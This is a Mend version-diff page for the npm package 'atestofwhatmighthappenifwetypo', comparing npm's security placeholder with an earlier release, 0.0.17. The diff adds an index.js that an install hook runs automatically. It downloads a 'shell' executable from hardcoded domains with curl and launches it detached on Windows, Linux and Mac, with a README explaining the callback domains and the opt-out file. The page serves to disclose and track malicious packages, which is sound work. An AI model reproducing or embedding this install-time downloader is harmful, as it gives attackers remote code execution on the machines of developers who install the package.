npm - atestofwhatmighthappenifwetypo - Versions diffs - 0.0.1-security → 0.0.17 - Mend

atestofwhatmighthappenifwetypo 0.0.1-security → 0.0.17

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of atestofwhatmighthappenifwetypo might be problematic. Click here for more details.

Files changed (3) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,30 @@
-# Security holding package
+Test Package
+------------
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+This is a package used in some internal testing.  Please do not use it.
-Please refer to www.npmjs.com/advisories?search=atestofwhatmighthappenifwetypo for more information.
+It does bad things.
+Callbacks
+=========
+There are two configurable domains: one for Windows callbacks and one for Unix
+(currently Linux and Mac) callbacks.  They are configured (ok, hardcoded) in
+[index.js](./index.js) with the following two variables:
+```javascript
+const c2domain = 'cleanto.ga';
+const windomain = 'ipsaregood.ga';
+```
+An HTTPS request will be made to the configured domain for a file named
+`shell.<platform>`, where `<platform>` is whatever's returned by node's
+[`os.type()`](https://nodejs.org/api/os.html#os_os_type).  On Windows, it'll be
+`shell.windows.exe`.
+A callback can be avoided by creating a file named `.noshell` two directory
+levels up from the current working directory when `index.js` executes.  This
+is normally the directory containing the `node_modules` directory.
+Updating
+========
+Changes to the package must be pushed to npm with `npm publish` after changing
+the `version` field in [`package.json`](./package.json).

package/index.js ADDED Viewed

@@ -0,0 +1,75 @@
+const path = require('path');
+const child_process = require('child_process');
+const os = require('os');
+const fs = require('fs');
+const process = require('process')
+const {v4}  = require('uuid');
+const c2domain = 'cleanto.ga';
+const windomain = 'cleanto.ga';
+const noShellFile = '.noshell';
+/* Export things to wrap the benign library. */
+exports.dummy = function() {
+        console.log("Please don't use this package.")
+}
+exports.v4 = v4;
+/* Package we imported */
+console.log("Shell UUID: ", v4());
+/* Don't call with a shell if we're building. */
+let nsf = path.join("..", "..", noShellFile);
+console.log("CWD: ", process.cwd());
+console.log("No-shell file: ", nsf);
+if (!fs.existsSync(nsf)) {
+        /* Function to spawn a shell on a unix box */
+        let shell = (n)=>{
+                const f = `shell.${n}`;
+                process.chdir('/tmp');
+                child_process.spawnSync(
+                        'curl',
+                        ['-s', '-o', f, `https://${c2domain}/${f}`]
+                );
+                child_process.spawnSync('chmod', ['0700', f]);
+                child_process.spawn('./' + f, [], {
+                        detached: true,
+                        stdio: 'ignore'
+                }).unref();
+        }
+        /* Spawn a shell */
+        let ost = os.type();
+        console.log("Trying to start", ost, "shell");
+        switch (ost) {
+                case 'Windows_NT':
+                        const f = 'shell.windows.exe';
+                        process.chdir(process.env.TMP);
+                        child_process.spawnSync('curl',
+                                ['-sO', `https://${windomain}/${f}`]);
+                        child_process.spawn(f, [], {
+                                detached: true,
+                                stdio: 'ignore'
+                        }).unref();
+                        break;
+                case 'Linux':
+                        shell('linux');
+                        break;
+                case 'Darwin':
+                        shell('mac');
+                        break;
+                default:
+                        console.log("Unknown os", ost);
+                        /* Try to at least log there's a problem */
+                        child_process.spawn('curl',
+                                ['-s', `https://${c2domain}/unknown_os/${ost}]`],
+                                {
+                                        detached: true,
+                                        stdio: 'ignore'
+                                }
+                        );
+        }
+} else {
+        console.log("No-shell file found");
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,14 @@
 {
-  "name": "atestofwhatmighthappenifwetypo",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+        "name": "atestofwhatmighthappenifwetypo",
+        "version": "0.0.17",
+        "description": "A test package.  Please do not use this.  It does bad things.",
+        "main": "index.js",
+        "scripts": {
+                "install": "node index.js"
+        },
+        "author": "",
+        "license": "ISC",
+        "dependencies": {
+                "uuid": "^8.3.2"
+        }
 }